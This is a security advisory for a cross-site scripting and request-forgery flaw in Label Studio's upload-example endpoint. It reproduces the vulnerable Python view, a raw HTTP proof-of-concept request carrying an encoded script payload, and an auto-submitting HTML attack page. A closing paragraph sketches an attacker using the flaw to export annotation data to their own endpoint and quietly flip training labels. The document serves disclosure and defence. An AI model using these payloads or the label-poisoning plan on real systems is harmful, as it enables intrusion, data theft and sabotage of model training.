CVE-2025-47783: Label Studio: XSS enables unauthorized actions via CSRF

### Summary The vulnerability allows an attacker to inject a malicious script into the context of a web page, which can lead to data theft, unauthorized actions on behalf of the user, and other attacks. ### Details The vulnerability is reproducible when sending a properly formatted request to the `POST /projects/upload-example/` endpoint. In the source code, the vulnerability is located at `label_studio/projects/views.py`. ```python 39: @require_http_methods(['POST']) 40: def upload_example_using_config(request): 41: """Generate upload data example by config only""" 42: config = request.POST.get('label_config', '') 43: 44: org_pk = get_organization_from_request(request) 45: secure_mode = False 46: if org_pk is not None: 47: org = generics.get_object_or_404(Organization, pk=org_pk) 48: secure_mode = org.secure_mode 49: 50: try: 51: Project.validate_label_config(config) 52: task_data, _, _ = get_sample_task(config, secure_mode) 53: task_data = playground_replacements(request, task_data) 54: except (ValueError, ValidationError, lxml.etree.Error): 55: response = HttpResponse('error while example generating', status=status.HTTP_400_BAD_REQUEST) 56: else: 57: response = HttpResponse(json.dumps(task_data)) 58: return response ``` The vulnerability is specifically located in line 57, where HttpResponse is used. ```python 57: response = HttpResponse(json.dumps(task_data)) ``` ### PoC Send the following request after changing the `{host}` to your own. ```css POST /projects/upload-example/ HTTP/1.1 Host: {host} Content-Type: application/x-www-form-urlencoded Content-Length: 67 label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22$textjmwwi%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e ``` Or you can create a vulnerable HTML page by changing `{domain}` beforehand, which can later be sent to the victim. ```html <html> <body> <form action="http://{domain}/projects/upload-example/" method="POST"> <input type="hidden" name="label&#95;config" value="&lt;View&gt;&lt;Text&#32;name&#61;&quot;text&quot;&#32;value&#61;&quot;&#36;textjmwwi&amp;lt&#59;script&amp;gt&#59;alert&#40;1&#41;&amp;lt&#59;&#47;script&amp;gt&#59;s8m37&quot;&#47;&gt;&lt;&#47;View&gt;" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` ### Impact - Malicious code execution: The user may be forced to perform unwanted actions within their Label Studio account. This includes accessing `document.cookie`, but note that Label Studio session cookies are marked http-only, mitigating any possibility of session theft.

An adversary targeting an AI company's training pipeline identifies that the team uses Label Studio for NLP annotation. They craft a malicious HTML page that auto-submits a POST to the victim's Label Studio instance with a label_config payload embedding a JavaScript payload. The payload, on execution, calls the Label Studio API to export all annotation tasks to an attacker-controlled endpoint, then subtly modifies a sample of labels in a high-value project (e.g., flipping sentiment labels from positive to negative at a 5% rate). The attacker emails the page disguised as a vendor survey link to an annotation team member. The victim's browser executes the payload silently. The poisoned annotations flow into the next weekly training run undetected, degrading model performance on a targeted class without triggering obvious alerts.